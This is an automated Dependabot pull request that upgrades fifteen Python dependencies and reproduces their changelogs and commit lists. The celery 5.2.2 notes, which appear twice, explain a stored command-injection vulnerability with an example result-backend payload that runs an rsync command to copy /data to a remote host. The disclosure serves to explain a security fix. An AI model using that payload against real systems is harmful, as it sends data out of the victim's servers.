Bump the pip group across 1 directory with 15 updates #7

dependabot · 2024-06-28T21:30:22Z

Bumps the pip group with 15 updates in the /requirements directory:

Package	From	To
pip	`19.3.1`	`23.3`
django	`1.11.27`	`3.2.25`
djangorestframework	`3.10.3`	`3.15.2`
django-filter	`2.2.0`	`2.4.0`
requests	`2.22.0`	`2.32.2`
pyyaml	`5.1.2`	`5.4`
celery	`4.3.0`	`5.2.2`
gitpython	`3.0.4`	`3.1.41`
orjson	`2.0.7`	`3.9.15`
nltk	`3.4.5`	`3.8.1`
azure-storage-blob	`1.5.0`	`12.13.0`
django-debug-toolbar	`2.0`	`2.2.1`
pillow	`6.2.0`	`10.3.0`
mercurial	`4.4.2`	`4.9`
yamale	`2.0.1`	`3.0.8`

Updates pip from 19.3.1 to 23.3

Changelog

Sourced from pip's changelog.

23.3 (2023-10-15)

Process

Added reference to vulnerability reporting guidelines <https://www.python.org/dev/security/>_ to pip's security policy.

Deprecations and Removals

Drop a fallback to using SecureTransport on macOS. It was useful when pip detected OpenSSL older than 1.0.1, but the current pip does not support any Python version supporting such old OpenSSL versions. ([#12175](https://github.com/pypa/pip/issues/12175) <https://github.com/pypa/pip/issues/12175>_)

Features

Improve extras resolution for multiple constraints on same base package. ([#11924](https://github.com/pypa/pip/issues/11924) <https://github.com/pypa/pip/issues/11924>_)

Improve use of datastructures to make candidate selection 1.6x faster. ([#12204](https://github.com/pypa/pip/issues/12204) <https://github.com/pypa/pip/issues/12204>_)

Allow pip install --dry-run to use platform and ABI overriding options. ([#12215](https://github.com/pypa/pip/issues/12215) <https://github.com/pypa/pip/issues/12215>_)

Add is_yanked boolean entry to the installation report (--report) to indicate whether the requirement was yanked from the index, but was still selected by pip conform to :pep:592. ([#12224](https://github.com/pypa/pip/issues/12224) <https://github.com/pypa/pip/issues/12224>_)

Bug Fixes

Ignore errors in temporary directory cleanup (show a warning instead). ([#11394](https://github.com/pypa/pip/issues/11394) <https://github.com/pypa/pip/issues/11394>_)

Normalize extras according to :pep:685 from package metadata in the resolver for comparison. This ensures extras are correctly compared and merged as long as the package providing the extra(s) is built with values normalized according to the standard. Note, however, that this does not solve cases where the package itself contains unnormalized extra values in the metadata. ([#11649](https://github.com/pypa/pip/issues/11649) <https://github.com/pypa/pip/issues/11649>_)

Prevent downloading sdists twice when :pep:658 metadata is present. ([#11847](https://github.com/pypa/pip/issues/11847) <https://github.com/pypa/pip/issues/11847>_)

Include all requested extras in the install report (--report). ([#11924](https://github.com/pypa/pip/issues/11924) <https://github.com/pypa/pip/issues/11924>_)

Removed uses of datetime.datetime.utcnow from non-vendored code. ([#12005](https://github.com/pypa/pip/issues/12005) <https://github.com/pypa/pip/issues/12005>_)

Consistently report whether a dependency comes from an extra. ([#12095](https://github.com/pypa/pip/issues/12095) <https://github.com/pypa/pip/issues/12095>_)

Fix completion script for zsh ([#12166](https://github.com/pypa/pip/issues/12166) <https://github.com/pypa/pip/issues/12166>_)

Fix improper handling of the new onexc argument of shutil.rmtree() in Python 3.12. ([#12187](https://github.com/pypa/pip/issues/12187) <https://github.com/pypa/pip/issues/12187>_)

Filter out yanked links from the available versions error message: "(from versions: 1.0, 2.0, 3.0)" will not contain yanked versions conform PEP 592. The yanked versions (if any) will be mentioned in a separate error message. ([#12225](https://github.com/pypa/pip/issues/12225) <https://github.com/pypa/pip/issues/12225>_)

Fix crash when the git version number contains something else than digits and dots. ([#12280](https://github.com/pypa/pip/issues/12280) <https://github.com/pypa/pip/issues/12280>_)

Use -r=... instead of -r ... to specify references with Mercurial. ([#12306](https://github.com/pypa/pip/issues/12306) <https://github.com/pypa/pip/issues/12306>_)

Redact password from URLs in some additional places. ([#12350](https://github.com/pypa/pip/issues/12350) <https://github.com/pypa/pip/issues/12350>_)

pip uses less memory when caching large packages. As a result, there is a new on-disk cache format stored in a new directory ($PIP_CACHE_DIR/http-v2). ([#2984](https://github.com/pypa/pip/issues/2984) <https://github.com/pypa/pip/issues/2984>_)

Vendored Libraries

Upgrade certifi to 2023.7.22

Add truststore 0.8.0

Upgrade urllib3 to 1.26.17

Improved Documentation

... (truncated)

Commits

e3dc91d Bump for release
3e85558 Update AUTHORS.txt
8d02787 Reclassify news fragment
f6ecf40 Merge pull request #12350 from sbidoul/readact-collecting-url
3060865 Merge pull request #12335 from edmorley/patch-1
8f0ed32 Redact URLs in Collecting... logs
d1659b8 Correct issue number for NEWS entry added by #12197
2333ef3 Upgrade urllib3 to 1.26.17 (#12343)
496b268 Update "Running Tests" documentation (#12334)
d1f0981 Merge pull request #12331 from sbidoul/update-egg-deprecation-message
Additional commits viewable in compare view

Updates django from 1.11.27 to 3.2.25

Commits

c98eca3 [3.2.x] Bumped version for 3.2.25 release.
072963e [3.2.x] Fixed CVE-2024-27351 -- Prevented potential ReDoS in Truncator.words().
2ad2676 [3.2.x] Added release date for 3.2.25.
fc41af6 [3.2.x] Fixed #35172 -- Fixed intcomma for string floats.
b9170b4 [3.2.x] Added CVE-2024-24680 to security archive.
e5350a9 [3.2.x] Post release version bump.
f5c8808 [3.2.x] Bumped version for 3.2.24 release.
c1171ff [3.2.x] Fixed CVE-2024-24680 -- Mitigated potential DoS in intcomma template ...
9dc3456 [3.2.x] Added stub release notes 3.2.24.
90eae45 [3.2.x] Fixed documented alias of smart_text().
Additional commits viewable in compare view

Updates djangorestframework from 3.10.3 to 3.15.2

Release notes

Sourced from djangorestframework's releases.

Version 3.15.1

What's Changed

Update the message to be consistent with the Django `HttpResponseBa… by @maycuatroi in encode/django-rest-framework#9287

Make inflection package truly optional by @browniebroke in encode/django-rest-framework#9303

Fix broken links in release notes for 3.15 by @browniebroke in encode/django-rest-framework#9305

TokenAdmin.autocomplete_fields Breaks Some Use Cases, Revert by @alexdlaird in encode/django-rest-framework#9301

Add drf-sendables to third-party-packages.md by @amikrop in encode/django-rest-framework#9261

Revert "feat: Add some changes to ValidationError to support django style vad…" by @auvipy in encode/django-rest-framework#9326

Revert "Re-prefetch related objects after updating" by @auvipy in encode/django-rest-framework#9327

Revert #8863 by @tomchristie in encode/django-rest-framework#9330

Revert #8009 by @tomchristie in encode/django-rest-framework#9332

Revert #9030 by @tomchristie in encode/django-rest-framework#9333

Revert "Fix NamespaceVersioning ignoring DEFAULT_VERSION on non-None namespaces" by @auvipy in encode/django-rest-framework#9335

SearchFilter.get_search_terms returns list. by @tomchristie in encode/django-rest-framework#9338

Version 3.15.1 by @tomchristie in encode/django-rest-framework#9339

New Contributors

@maycuatroi made their first contribution in encode/django-rest-framework#9287

@alexdlaird made their first contribution in encode/django-rest-framework#9301

Full Changelog: encode/django-rest-framework@3.15.0...3.15.1

Version 3.14.0

Django 2.2 is no longer supported. #8662

Django 4.1 compatibility. #8591

Add --api-version CLI option to generateschema management command. #8663

Enforce is_valid(raise_exception=False) as a keyword-only argument. #7952

Stop calling set_context on Validators. #8589

Return NotImplemented from ErrorDetails.__ne__. #8538

Don't evaluate DateTimeField.default_timezone when a custom timezone is set. #8531

Make relative URLs clickable in Browseable API. #8464

Support ManyRelatedField falling back to the default value when the attribute specified by dot notation doesn't exist. Matches ManyRelatedField.get_attribute to Field.get_attribute. #7574

Make schemas.openapi.get_reference public. #7515

Make ReturnDict support dict union operators on Python 3.9 and later. #8302

Update throttling to check if request.user is set before checking if the user is authenticated. #8370

Version 3.13.1

Revert schema naming changes with function based @api_view. #8297

Version 3.13.0

Django 4.0 compatability. #8178

Add max_length and min_length options to ListSerializer. #8165

Add get_request_serializer and get_response_serializer hooks to AutoSchema. #7424

Fix OpenAPI representation of null-able read only fields. #8116

Respect UNICODE_JSON setting in API schema outputs. #7991

Fix for RemoteUserAuthentication. #7158

Make Field constructors keyword-only. #7632

3.12.4

No release notes provided.

Commits

c7a7eae Version 3.15.2 (#9439)
3b41f01 Fix potential XSS vulnerability in break_long_headers template filter (#9435)
fe92f0d Add __hash__ method for permissions.OperandHolder class (#9417)
fbdab09 docs: Correct some evaluation results and a httpie option in Tutorial1 (#9421)
36d5c0e tests: Check urlpatterns after cleanups (#9400)
9d4ed05 Don't use Windows line endings
b34bde4 Fix typo in setup.cfg setting
ab681f2 Update requirements in docs
2237724 bump pygments (security hygiene)
d58b8da Update deprecation hints
Additional commits viewable in compare view

Updates django-filter from 2.2.0 to 2.4.0

Release notes

Sourced from django-filter's releases.

Version 2.4.0

SECURITY: Added a MaxValueValidator to the form field for NumberFilter. This prevents a potential DoS attack if numbers with very large exponents were subsequently converted to integers.

The default limit value for the validator is 1e50.

The new NumberFilter.get_max_validator() allows customising the used validator, and may return None to disable the validation entirely.

Added testing against Django 3.1 and Python 3.9.

In addition tests against Django main development branch are now required to pass.

Version 2.3.0

https://github.com/carltongibson/django-filter/blob/master/CHANGES.rst#version-230-2020-6-5

Changelog

Sourced from django-filter's changelog.

Version 2.4.0 (2020-9-27)

SECURITY: Added a MaxValueValidator to the form field for NumberFilter. This prevents a potential DoS attack if numbers with very large exponents were subsequently converted to integers.

The default limit value for the validator is 1e50.

The new NumberFilter.get_max_validator() allows customising the used validator, and may return None to disable the validation entirely.

Added testing against Django 3.1 and Python 3.9.

In addition tests against Django main development branch are now required to pass.

Version 2.3.0 (2020-6-5)

Fixed import of FieldDoesNotExist. (#1127)

Added testing against Django 3.0. (#1125)

Declared support for, and added testing against, Python 3.8. (#1138)

Fix filterset multiple inheritance bug (#1131)

Allowed customising default lookup expression. (#1129)

Drop Django 2.1 and below (#1180)

Fixed IsoDateTimeRangeFieldTests for Django 3.1

Require tests to pass against Django master.

Version 2.2 (2019-7-16)

Added DjangoFilterBackend.get_schema_operation_parameters() for DRF 3.10+ OpenAPI schema generation. (#1086)

Added lookup_expr to MultipleChoiceFilter (#1054)

Dropped support for EOL Python 3.4

Version 2.1 (2019-1-20)

Fixed a regression in FilterView introduced in 2.0. An empty QuerySet was incorrectly used whenever the FilterSet was unbound (i.e. when there were no GET parameters). The correct, pre-2.0 behaviour is now restored.

A workaround was to set strict=False on the FilterSet. This is no longer necessary, so you may restore strict behaviour as desired.

... (truncated)

Commits

7821072 Postpone move to CalVer.
fd5824e Restore version declaration in setup.py.
c9daa68 Version 20.9.0.
c045bbe Droped using bumpversion.
b1f56ed Use single version reference from main module.
451d372 Update docs copyright year.
82c9a42 Added MaxValueValidator to NumberFilter.
2ebce74 Confirmed compatibility with Python 3.9. (#1270)
85c9572 Run tests with GitHub Actions
d9f389f Update Jinja test dependency.
Additional commits viewable in compare view

Updates requests from 2.22.0 to 2.32.2

Release notes

Sourced from requests's releases.

v2.32.2

2.32.2 (2024-05-21)

Deprecations

To provide a more stable migration for custom HTTPAdapters impacted by the CVE changes in 2.32.0, we've renamed _get_connection to a new public API, get_connection_with_tls_context. Existing custom HTTPAdapters will need to migrate their code to use this new API. get_connection is considered deprecated in all versions of Requests>=2.32.0.

A minimal (2-line) example has been provided in the linked PR to ease migration, but we strongly urge users to evaluate if their custom adapter is subject to the same issue described in CVE-2024-35195. (#6710)

v2.32.1

2.32.1 (2024-05-20)

Bugfixes

Add missing test certs to the sdist distributed on PyPI.

v2.32.0

2.32.0 (2024-05-20)

🐍 PYCON US 2024 EDITION 🐍

Security

Fixed an issue where setting verify=False on the first request from a Session will cause subsequent requests to the same origin to also ignore cert verification, regardless of the value of verify. (GHSA-9wx4-h78v-vm56)

Improvements

verify=True now reuses a global SSLContext which should improve request time variance between first and subsequent requests. It should also minimize certificate load time on Windows systems when using a Python version built with OpenSSL 3.x. (#6667)

Requests now supports optional use of character detection (chardet or charset_normalizer) when repackaged or vendored. This enables pip and other projects to minimize their vendoring surface area. The Response.text() and apparent_encoding APIs will default to utf-8 if neither library is present. (#6702)

Bugfixes

Fixed bug in length detection where emoji length was incorrectly calculated in the request content-length. (#6589)

Fixed deserialization bug in JSONDecodeError. (#6629)

Fixed bug where an extra leading / (path separator) could lead urllib3 to unnecessarily reparse the request URI. (#6644)

... (truncated)

Changelog

Sourced from requests's changelog.

2.32.2 (2024-05-21)

Deprecations

To provide a more stable migration for custom HTTPAdapters impacted by the CVE changes in 2.32.0, we've renamed _get_connection to a new public API, get_connection_with_tls_context. Existing custom HTTPAdapters will need to migrate their code to use this new API. get_connection is considered deprecated in all versions of Requests>=2.32.0.

A minimal (2-line) example has been provided in the linked PR to ease migration, but we strongly urge users to evaluate if their custom adapter is subject to the same issue described in CVE-2024-35195. (#6710)

2.32.1 (2024-05-20)

Bugfixes

Add missing test certs to the sdist distributed on PyPI.

2.32.0 (2024-05-20)

Security

Fixed an issue where setting verify=False on the first request from a Session will cause subsequent requests to the same origin to also ignore cert verification, regardless of the value of verify. (GHSA-9wx4-h78v-vm56)

Improvements

verify=True now reuses a global SSLContext which should improve request time variance between first and subsequent requests. It should also minimize certificate load time on Windows systems when using a Python version built with OpenSSL 3.x. (#6667)

Requests now supports optional use of character detection (chardet or charset_normalizer) when repackaged or vendored. This enables pip and other projects to minimize their vendoring surface area. The Response.text() and apparent_encoding APIs will default to utf-8 if neither library is present. (#6702)

Bugfixes

Fixed bug in length detection where emoji length was incorrectly calculated in the request content-length. (#6589)

Fixed deserialization bug in JSONDecodeError. (#6629)

Fixed bug where an extra leading / (path separator) could lead urllib3 to unnecessarily reparse the request URI. (#6644)

Deprecations

... (truncated)

Commits

88dce9d v2.32.2
c98e4d1 Merge pull request #6710 from nateprewitt/api_rename
92075b3 Add deprecation warning
aa1461b Move _get_connection to get_connection_with_tls_context
970e8ce v2.32.1
d6ebc4a v2.32.0
9a40d12 Avoid reloading root certificates to improve concurrent performance (#6667)
0c030f7 Merge pull request #6702 from nateprewitt/no_char_detection
555b870 Allow character detection dependencies to be optional in post-packaging steps
d6dded3 Merge pull request #6700 from franekmagiera/update-redirect-to-invalid-uri-test
Additional commits viewable in compare view

Updates pyyaml from 5.1.2 to 5.4

Changelog

Sourced from pyyaml's changelog.

5.4 (2021-01-19)

yaml/pyyaml#407 -- Build modernization, remove distutils, fix metadata, build wheels, CI to GHA

yaml/pyyaml#472 -- Fix for CVE-2020-14343, moves arbitrary python tags to UnsafeLoader

yaml/pyyaml#441 -- Fix memory leak in implicit resolver setup

yaml/pyyaml#392 -- Fix py2 copy support for timezone objects

yaml/pyyaml#378 -- Fix compatibility with Jython

5.3.1 (2020-03-18)

yaml/pyyaml#386 -- Prevents arbitrary code execution during python/object/new constructor

5.3 (2020-01-06)

yaml/pyyaml#290 -- Use is instead of equality for comparing with None

yaml/pyyaml#270 -- Fix typos and stylistic nit

yaml/pyyaml#309 -- Fix up small typo

yaml/pyyaml#161 -- Fix handling of slots

yaml/pyyaml#358 -- Allow calling add_multi_constructor with None

yaml/pyyaml#285 -- Add use of safe_load() function in README

yaml/pyyaml#351 -- Fix reader for Unicode code points over 0xFFFF

yaml/pyyaml#360 -- Enable certain unicode tests when maxunicode not > 0xffff

yaml/pyyaml#359 -- Use full_load in yaml-highlight example

yaml/pyyaml#244 -- Document that PyYAML is implemented with Cython

yaml/pyyaml#329 -- Fix for Python 3.10

yaml/pyyaml#310 -- Increase size of index, line, and column fields

yaml/pyyaml#260 -- Remove some unused imports

yaml/pyyaml#163 -- Create timezone-aware datetimes when parsed as such

yaml/pyyaml#363 -- Add tests for timezone

5.2 (2019-12-02)

Repair incompatibilities introduced with 5.1. The default Loader was changed, but several methods like add_constructor still used the old default yaml/pyyaml#279 -- A more flexible fix for custom tag constructors yaml/pyyaml#287 -- Change default loader for yaml.add_constructor yaml/pyyaml#305 -- Change default loader for add_implicit_resolver, add_path_resolver

Make FullLoader safer by removing python/object/apply from the default FullLoader yaml/pyyaml#347 -- Move constructor for object/apply to UnsafeConstructor

Fix bug introduced in 5.1 where quoting went wrong on systems with sys.maxunicode <= 0xffff yaml/pyyaml#276 -- Fix logic for quoting special characters

Other PRs: yaml/pyyaml#280 -- Update CHANGES for 5.1

Commits

58d0cb7 5.4 release
a60f7a1 Fix compatibility with Jython
ee98abd Run CI on PR base branch changes
ddf2033 constructor.timezone: _copy & deepcopy
fc914d5 Avoid repeatedly appending to yaml_implicit_resolvers
a001f27 Fix for CVE-2020-14343
fe15062 Add 3.9 to appveyor file for completeness sake
1e1c7fb Add a newline character to end of pyproject.toml
0b6b7d6 Start sentences and phrases for capital letters
c976915 Shell code improvements
Additional commits viewable in compare view

Updates celery from 4.3.0 to 5.2.2

Release notes

Sourced from celery's releases.

5.2.2

Release date: 2021-12-26 16:30 P.M UTC+2:00

Release by: Omer Katz
Various documentation fixes.
Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:
{
      "exc_module": "os",
      'exc_type': "system",
      "exc_message": "rsync /data [email protected]:~/data"
}
According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
v5.2.1

Release date: 2021-11-16 8.55 P.M UTC+6:00

Release by: Asif Saif Uddin

Fix rstrip usage on bytes instance in ProxyLogger.

Pass logfile to ExecStop in celery.service example systemd file.

fix: reduce latency of AsyncResult.get under gevent (#7052)

Limit redis version: <4.0.0.

Bump min kombu version to 5.2.2.

Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.

... (truncated)

Changelog

Sourced from celery's changelog.

5.2.2

:release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz
Various documentation fixes.
Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

.. code-block:: python
  {
        "exc_module": "os",
        'exc_type': "system",
        "exc_message": "rsync /data [email protected]:~/data"
  }
According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
.. _version-5.2.1:

5.2.1

:release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin

Fix rstrip usage on bytes instance in ProxyLogger.

Pass logfile to ExecStop in celery.service example systemd file.

fix: reduce latency of AsyncResult.get under gevent (#7052)

Limit redis version: <4.0.0.

Bump min kombu version to 5.2.2.

... (truncated)

Commits

b21c13d Bump version: 5.2.1 → 5.2.2
a60b486 Add changelog for 5.2.2.
3e5d630 Fix changelog formatting.
1f7ad7e Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).
2d8dbc2 Update configuration.rst
9596aba Fix typo in documentation
639ad83 update doc to reflect Celery 5.2.x (#7153)
d32356c Bump version: 5.2.0 → 5.2.1
6842a78 Merge branch 'master' of https://github.com/celery/celery
4c92cb7 changelog for v5.2.1
Additional commits viewable in compare view

Updates gitpython from 3.0.4 to 3.1.41

Release notes

Sourced from gitpython's releases.

3.1.41 - fix Windows security issue

The details about the Windows security issue can be found in this advisory.

Special thanks go to @EliahKagan who reported the issue and fixed it in a single stroke, while being responsible for an incredible amount of improvements that he contributed over the last couple of months ❤️.

What's Changed

Add __all__ in git.exc by @EliahKagan in gitpython-developers/GitPython#1719

Set submodule update cadence to weekly by @EliahKagan in gitpython-developers/GitPython#1721

Never modify sys.path by @EliahKagan in gitpython-developers/GitPython#1720

Bump git/ext/gitdb from 8ec2390 to ec58b7e by @dependabot in gitpython-developers/GitPython#1722

Revise comments, docstrings, some messages, and a bit of code by @EliahKagan in gitpython-developers/GitPython#1725

Use zero-argument super() by @EliahKagan in gitpython-developers/GitPython#1726

Remove obsolete note in _iter_packed_refs by @EliahKagan in gitpython-developers/GitPython#1727

Reorganize test_util and make xfail marks precise by @EliahKagan in gitpython-developers/GitPython#1729

Clarify license and make module top comments more consistent by @EliahKagan in gitpython-developers/GitPython#1730

Deprecate compat.is_, rewriting all uses by @EliahKagan in gitpython-developers/GitPython#1732

Revise and restore some module docstrings by @EliahKagan in gitpython-developers/GitPython#1735

Make the rmtree callback Windows-only by @EliahKagan in gitpython-developers/GitPython#1739

List all non-passing tests in test summaries by @EliahKagan in gitpython-developers/GitPython#1740

Document some minor subtleties in test_util.py by @EliahKagan in gitpython-developers/GitPython#1749

Always read metadata files as UTF-8 in setup.py by @EliahKagan in gitpython-developers/GitPython#1748

Test native Windows on CI by @EliahKagan in gitpython-developers/GitPython#1745

Test macOS on CI by @EliahKagan in gitpython-developers/GitPython#1752

Let close_fds be True on all platforms by @EliahKagan in gitpython-developers/GitPython#1753

Fix IndexFile.from_tree on Windows by @EliahKagan in gitpython-developers/GitPython#1751

Remove unused TASKKILL fallback in AutoInterrupt by @EliahKagan in gitpython-developers/GitPython#1754

Don't return with operand when conceptually void by @EliahKagan in gitpython-developers/GitPython#1755

Group .gitignore entries by purpose by @EliahKagan in gitpython-developers/GitPython#1758

Adding dubious ownership handling by @marioaag in gitpython-developers/GitPython#1746

Avoid brittle assumptions about preexisting temporary files in tests by @EliahKagan in gitpython-developers/GitPython#1759

Overhaul noqa directives by @EliahKagan in gitpython-developers/GitPython#1760

Clarify some Git.execute kill_after_timeout limitations by @EliahKagan in gitpython-developers/GitPython#1761

Bump actions/setup-python from 4 to 5 by @dependabot in gitpython-developers/GitPython#1763

Don't install black on Cygwin by @EliahKagan in gitpython-developers/GitPython#1766

Extract all "import gc" to module level by @EliahKagan in gitpython-developers/GitPython#1765

Extract remaining local "import gc" to module level by @EliahKagan in gitpython-developers/GitPython#1768

Replace xfail with gc.collect in TestSubmodule.test_rename by @EliahKagan in gitpython-developers/GitPython#1767

Enable CodeQL by @EliahKagan in gitpython-developers/GitPython#1769

Replace some uses of the deprecated mktemp function by @EliahKagan in gitpython-developers/GitPython#1770

Bump github/codeql-action from 2 to 3 by @dependabot in gitpython-developers/GitPython#1773

Run some Windows environment variable tests only on Windows by @EliahKagan in gitpython-developers/GitPython#1774

Fix TemporaryFileSwap regression where file_path could not be Path by @EliahKagan in gitpython-developers/GitPython#1776

Improve hooks tests by @EliahKagan in gitpython-developers/GitPython#1777

Fix if items of Index is of type PathLike by @stegm in gitpython-developers/GitPython#1778

Better document IterableObj.iter_items and improve some subclasses by @EliahKagan in gitpython-developers/GitPython#1780

Revert "Don't install black on Cygwin" by @EliahKagan in gitpython-developers/GitPython#1783

Add missing pip in $PATH on Cygwin CI by @EliahKagan in gitpython-developers/GitPython#1784

Shorten Iterable docstrings and put IterableObj first by @EliahKagan in gitpython-developers/GitPython#1785

Fix incompletely revised Iterable/IterableObj docstrings by @EliahKagan in gitpython-developers/GitPython#1786

Pre-deprecate setting Git.USE_SHELL by @EliahKagan in gitpython-developers/GitPython#1782

... (truncated)

Commits

f288738 bump patch level
ef3192c Merge pull request #1792 from EliahKagan/popen
1f3caa3 Further clarify comment in test_hook_uses_shell_not_from_cwd
3eb7c2a Move safer_popen from git.util to git.cmd
c551e91 Extract shared logic for using Popen safely on Windows
15ebb25 Clarify comment in test_hook_uses_shell_not_from_cwd
f44524a Avoid spurious "location may have moved" on Windows
a42ea0a Cover absent/no-distro bash.exe in hooks "not from cwd" test
7751436 Extract venv management from test_installation
66ff4c1 Omit CWD in search for bash.exe to run hooks on Windows
Additional commits viewable in compare view

Updates orjson from 2.0.7 to 3.9.15

Release notes

Sourced from orjson's releases.

3.9.15

Fixed

Implement recursion limit of 1024 on orjson.loads().

Use byte-exact read on str formatting SIMD path to avoid crash.

3.9.14

Fixed

Fix crash serializing str introduced in 3.9.11.

Changed

Build now depends on Rust 1.72 or later.

3.9.13

Fixed

Serialization str escape uses only 128-bit SIMD.

Fix compatibility with CPython 3.13 alpha 3.

Changed

Publish musllinux_1_2 instead of musllinux_1_1 wheels.

Serialization uses small integer optimization in CPython 3.12 or later.

3.9.12

Fixed

Minimal musllinux_1_1 build due to sporadic CI failure.

Changed

Update benchmarks in README.

3.9.11

Changed

Improve performance of serializing. str is significantly faster. Documents using dict, list, and tuple are somewhat faster.

3.9.10

Fixed

Fix debug assert failure on 3.12 --profile=dev build.

3.9.9

Changed

orjson module metadata explicitly marks subinterpreters as not supported.

... (truncated)

Changelog

Sourced from orjson's changelog.

3.9.15 - 2024-02-23

Fixed

Implement recursion limit of 1024 on orjson.loads().

Use byte-exact read on str formatting SIMD path to avoid crash.

3.9.14 - 2024-02-14

Fixed

Fix crash serializing str introduced in 3.9.11.

Changed

Build now depends on Rust 1.72 or later.

3.9.13 - 2024-02-03

Fixed

Serialization str escape uses only 128-bit SIMD.

Fix compatibility with CPython 3.13 alpha 3.

Changed

Publish musllinux_1_2 instead of musllinux_1_1 wheels.

Serialization uses small integer optimization in CPython 3.12 or later.

3.9.12 - 2024-01-18

Changed

Update benchmarks ...
Description has been truncated

Bumps the pip group with 15 updates in the /requirements directory: | Package | From | To | | --- | --- | --- | | [pip](https://github.com/pypa/pip) | `19.3.1` | `23.3` | | [django](https://github.com/django/django) | `1.11.27` | `3.2.25` | | [djangorestframework](https://github.com/encode/django-rest-framework) | `3.10.3` | `3.15.2` | | [django-filter](https://github.com/carltongibson/django-filter) | `2.2.0` | `2.4.0` | | [requests](https://github.com/psf/requests) | `2.22.0` | `2.32.2` | | [pyyaml](https://github.com/yaml/pyyaml) | `5.1.2` | `5.4` | | [celery](https://github.com/celery/celery) | `4.3.0` | `5.2.2` | | [gitpython](https://github.com/gitpython-developers/GitPython) | `3.0.4` | `3.1.41` | | [orjson](https://github.com/ijl/orjson) | `2.0.7` | `3.9.15` | | [nltk](https://github.com/nltk/nltk) | `3.4.5` | `3.8.1` | | [azure-storage-blob](https://github.com/Azure/azure-sdk-for-python) | `1.5.0` | `12.13.0` | | [django-debug-toolbar](https://github.com/jazzband/django-debug-toolbar) | `2.0` | `2.2.1` | | [pillow](https://github.com/python-pillow/Pillow) | `6.2.0` | `10.3.0` | | [mercurial](https://mercurial-scm.org/) | `4.4.2` | `4.9` | | [yamale](https://github.com/23andMe/Yamale) | `2.0.1` | `3.0.8` | Updates `pip` from 19.3.1 to 23.3 - [Changelog](https://github.com/pypa/pip/blob/main/NEWS.rst) - [Commits](pypa/pip@19.3.1...23.3) Updates `django` from 1.11.27 to 3.2.25 - [Commits](django/django@1.11.27...3.2.25) Updates `djangorestframework` from 3.10.3 to 3.15.2 - [Release notes](https://github.com/encode/django-rest-framework/releases) - [Commits](encode/django-rest-framework@3.10.3...3.15.2) Updates `django-filter` from 2.2.0 to 2.4.0 - [Release notes](https://github.com/carltongibson/django-filter/releases) - [Changelog](https://github.com/carltongibson/django-filter/blob/main/CHANGES.rst) - [Commits](carltongibson/django-filter@2.2.0...2.4.0) Updates `requests` from 2.22.0 to 2.32.2 - [Release notes](https://github.com/psf/requests/releases) - [Changelog](https://github.com/psf/requests/blob/main/HISTORY.md) - [Commits](psf/requests@v2.22.0...v2.32.2) Updates `pyyaml` from 5.1.2 to 5.4 - [Release notes](https://github.com/yaml/pyyaml/releases) - [Changelog](https://github.com/yaml/pyyaml/blob/main/CHANGES) - [Commits](yaml/pyyaml@5.1.2...5.4) Updates `celery` from 4.3.0 to 5.2.2 - [Release notes](https://github.com/celery/celery/releases) - [Changelog](https://github.com/celery/celery/blob/main/Changelog.rst) - [Commits](celery/celery@v4.3.0...v5.2.2) Updates `gitpython` from 3.0.4 to 3.1.41 - [Release notes](https://github.com/gitpython-developers/GitPython/releases) - [Changelog](https://github.com/gitpython-developers/GitPython/blob/main/CHANGES) - [Commits](gitpython-developers/GitPython@3.0.4...3.1.41) Updates `orjson` from 2.0.7 to 3.9.15 - [Release notes](https://github.com/ijl/orjson/releases) - [Changelog](https://github.com/ijl/orjson/blob/master/CHANGELOG.md) - [Commits](ijl/orjson@2.0.7...3.9.15) Updates `nltk` from 3.4.5 to 3.8.1 - [Changelog](https://github.com/nltk/nltk/blob/develop/ChangeLog) - [Commits](nltk/nltk@3.4.5...3.8.1) Updates `azure-storage-blob` from 1.5.0 to 12.13.0 - [Release notes](https://github.com/Azure/azure-sdk-for-python/releases) - [Changelog](https://github.com/Azure/azure-sdk-for-python/blob/main/doc/esrp_release.md) - [Commits](Azure/azure-sdk-for-python@azure-core_1.5.0...azure-storage-blob_12.13.0) Updates `django-debug-toolbar` from 2.0 to 2.2.1 - [Release notes](https://github.com/jazzband/django-debug-toolbar/releases) - [Changelog](https://github.com/jazzband/django-debug-toolbar/blob/2.2.1/docs/changes.rst) - [Commits](django-commons/django-debug-toolbar@2.0...2.2.1) Updates `pillow` from 6.2.0 to 10.3.0 - [Release notes](https://github.com/python-pillow/Pillow/releases) - [Changelog](https://github.com/python-pillow/Pillow/blob/main/CHANGES.rst) - [Commits](python-pillow/Pillow@6.2.0...10.3.0) Updates `mercurial` from 4.4.2 to 4.9 Updates `yamale` from 2.0.1 to 3.0.8 - [Release notes](https://github.com/23andMe/Yamale/releases) - [Commits](23andMe/Yamale@2.0.1...3.0.8) --- updated-dependencies: - dependency-name: pip dependency-type: direct:production dependency-group: pip - dependency-name: django dependency-type: direct:production dependency-group: pip - dependency-name: djangorestframework dependency-type: direct:production dependency-group: pip - dependency-name: django-filter dependency-type: direct:production dependency-group: pip - dependency-name: requests dependency-type: direct:production dependency-group: pip - dependency-name: pyyaml 